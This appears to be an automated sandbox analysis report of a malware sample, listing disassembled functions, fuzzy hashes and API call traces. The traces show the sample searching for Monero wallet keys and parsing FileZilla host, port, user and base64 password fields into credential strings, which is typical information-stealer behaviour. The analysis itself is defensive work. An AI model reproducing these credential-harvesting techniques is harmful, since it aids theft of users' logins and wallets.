                            • Opcode ID: fa79e3b021822dc67a7198fcb4b5e03a8bfeca4692dc3b3e63daa9392d3ddad7
                            • Instruction ID: 692f7db6b7a722e4ac8daf92042b39c395af1e428bf6896c9e8fea7a943237cf
                            • Opcode Fuzzy Hash: fa79e3b021822dc67a7198fcb4b5e03a8bfeca4692dc3b3e63daa9392d3ddad7
                            • Instruction Fuzzy Hash: 6B7208F3A082009FE3146E29EC8577AF7E9EF94720F1A452DEAC4D3740EA3598418797
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006115B8,00610D96), ref: 005FF71E
                            • StrCmpCA.SHLWAPI(?,006115BC), ref: 005FF76F
                            • StrCmpCA.SHLWAPI(?,006115C0), ref: 005FF785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005FFAB1
                            • FindClose.KERNEL32(000000FF), ref: 005FFAC3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: adf30c47ff3ebf04835abf7dafefdba5c4605a42419896da0460f2aba94d7136
                            • Instruction ID: 16d1dbd3aa493d42b6522d4f321f3568e836cccaa53aa54383d0ea8fa3931ca8
                            • Opcode Fuzzy Hash: adf30c47ff3ebf04835abf7dafefdba5c4605a42419896da0460f2aba94d7136
                            • Instruction Fuzzy Hash: 8811B73084020D9BDB58FBE0DC55EEE773AAF10340F4086ADA51A564D2EF302B4ACB56
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: *YZz
                            • API String ID: 0-2099423365
                            • Opcode ID: 3dc38c93f7a3d786df789f86c4e122ec6459c008bf0bdb6c9f460982b13e82c2
                            • Instruction ID: 37fa79d3f09e84444cea8b28eb2ba59763bbb7acf6d82f6c7146524c1f1963b3
                            • Opcode Fuzzy Hash: 3dc38c93f7a3d786df789f86c4e122ec6459c008bf0bdb6c9f460982b13e82c2
                            • Instruction Fuzzy Hash: E46117F3A193005FF304992AEC8476BB7DAEFD8720F2AC53DE78883644E5388C058656
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: N'y9
                            • API String ID: 0-3329616576
                            • Opcode ID: 02cf6eaba779cab3f1d108a7ad1e451ab87d39ee43d1f3d15d1c5a64f6cba75d
                            • Instruction ID: 07dfea15286fbb57f61a99cd77175db4195408becfc3e6f5ced9536bf1d7d6e8
                            • Opcode Fuzzy Hash: 02cf6eaba779cab3f1d108a7ad1e451ab87d39ee43d1f3d15d1c5a64f6cba75d
                            • Instruction Fuzzy Hash: 055158F3E181109BF744682DED6477A76CACBD4330F3A863DEA95D7784E83A88054296
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: aB;
                            • API String ID: 0-4029130727
                            • Opcode ID: 44dee97118ea43ba73b69b017846ca541c9c00e905531635e68f9f396de97a13
                            • Instruction ID: 7b742195705a6d2fb55ce6939c728ee3b0d646cdf9a6163bac0672879f1652f0
                            • Opcode Fuzzy Hash: 44dee97118ea43ba73b69b017846ca541c9c00e905531635e68f9f396de97a13
                            • Instruction Fuzzy Hash: 6B516BF3E182105BE318692DEC49766BBDADBD4330F2A423EEA84D7784E8754C058196
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: mjh
                            • API String ID: 0-1552672764
                            • Opcode ID: 040ab4386c446f0367b29595092bf5dc656f11a51fa4063d497c3b4ddf22f7f6
                            • Instruction ID: 2408aab6d43b040642fa1cc5e8671062455bd4c5ce03d49afcc5fa9126647c39
                            • Opcode Fuzzy Hash: 040ab4386c446f0367b29595092bf5dc656f11a51fa4063d497c3b4ddf22f7f6
                            • Instruction Fuzzy Hash: FF5188F3B192289BE7045D2DDCD4776B7D9EB98221F2B423DDF88A7784E8361C058291
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3e3353a0fcce207860cc241cb880046b6ca4c293bd1f50de320bf3091525f23a
                            • Instruction ID: 0252b85350711f0bc50a07fe3b46d835b1c098ee3fec0bf47c436870e106a9cd
                            • Opcode Fuzzy Hash: 3e3353a0fcce207860cc241cb880046b6ca4c293bd1f50de320bf3091525f23a
                            • Instruction Fuzzy Hash: 6971E2F390C7049FE304AE69DCC176AB7D9EFA4324F1A863DE7D583380E97958008686
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fbd31a1b71dba1035aad2cfcad99c5c1e59b90f24a602c47cb2971e85e659b12
                            • Instruction ID: 06b6715463105c34e66f2f814d3d26d14d2f8e535062d7c8c8b4770cade624de
                            • Opcode Fuzzy Hash: fbd31a1b71dba1035aad2cfcad99c5c1e59b90f24a602c47cb2971e85e659b12
                            • Instruction Fuzzy Hash: 816126F3A082045FF3147A2DEC8977ABBD9EB94320F1A463DDBD483780E939581586C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3b9688dbfbedeee57fee5ce0b256f2f71f40e07663a3aec84e2e57625cf7d400
                            • Instruction ID: 3147b828162157012eba0fbab5295f7d3a52e71fa366e3079d364103fca73bf6
                            • Opcode Fuzzy Hash: 3b9688dbfbedeee57fee5ce0b256f2f71f40e07663a3aec84e2e57625cf7d400
                            • Instruction Fuzzy Hash: BA4136F3D082158BE7106D7DDD44366BBD6AB84320F2B4738DED897B84EA78480682C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1a71d55dabe6cc3a82ed67dadf0f4f0947e7f6fd5a5e8ceb8f77ccec43e59663
                            • Instruction ID: 015d4bab9fb3918de1428ea91735b76ba61ec333968319377ea44cf6a830d270
                            • Opcode Fuzzy Hash: 1a71d55dabe6cc3a82ed67dadf0f4f0947e7f6fd5a5e8ceb8f77ccec43e59663
                            • Instruction Fuzzy Hash: A54135F3E092241BE314592CDC947B6B7DADF94722F1A423DAF84A3784E97A1D0482D1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0b5c617e51856cd498bf304f48f7fd20b63aabd7fb4fb02c6ca06cb283637de0
                            • Instruction ID: adfd6255673c0732020f7515e0792ffa3531568f6bab91a3ef8ca76cb5f6e12f
                            • Opcode Fuzzy Hash: 0b5c617e51856cd498bf304f48f7fd20b63aabd7fb4fb02c6ca06cb283637de0
                            • Instruction Fuzzy Hash: 683167F7A092185BE350A92AEC847B7F7C9DF90720F168539EAC8D3740F9369805819A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 00608DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00608E0B
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005F99EC
                              • Part of subcall function 005F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005F9A11
                              • Part of subcall function 005F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005F9A31
                              • Part of subcall function 005F99C0: ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005F9A5A
                              • Part of subcall function 005F99C0: LocalFree.KERNEL32(005F148F), ref: 005F9A90
                              • Part of subcall function 005F99C0: CloseHandle.KERNEL32(000000FF), ref: 005F9A9A
                              • Part of subcall function 00608E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00608E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,00610DBA,00610DB7,00610DB6,00610DB3), ref: 00600362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00600369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00600385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 00600393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 006003CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 006003DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00600419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 00600427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00600463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 00600475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 00600502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 0060051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 00600532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00610DB2), ref: 0060054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00600562
                            • lstrcat.KERNEL32(?,profile: null), ref: 00600571
                            • lstrcat.KERNEL32(?,url: ), ref: 00600580
                            • lstrcat.KERNEL32(?,00000000), ref: 00600593
                            • lstrcat.KERNEL32(?,00611678), ref: 006005A2
                            • lstrcat.KERNEL32(?,00000000), ref: 006005B5
                            • lstrcat.KERNEL32(?,0061167C), ref: 006005C4
                            • lstrcat.KERNEL32(?,login: ), ref: 006005D3
                            • lstrcat.KERNEL32(?,00000000), ref: 006005E6
                            • lstrcat.KERNEL32(?,00611688), ref: 006005F5
                            • lstrcat.KERNEL32(?,password: ), ref: 00600604
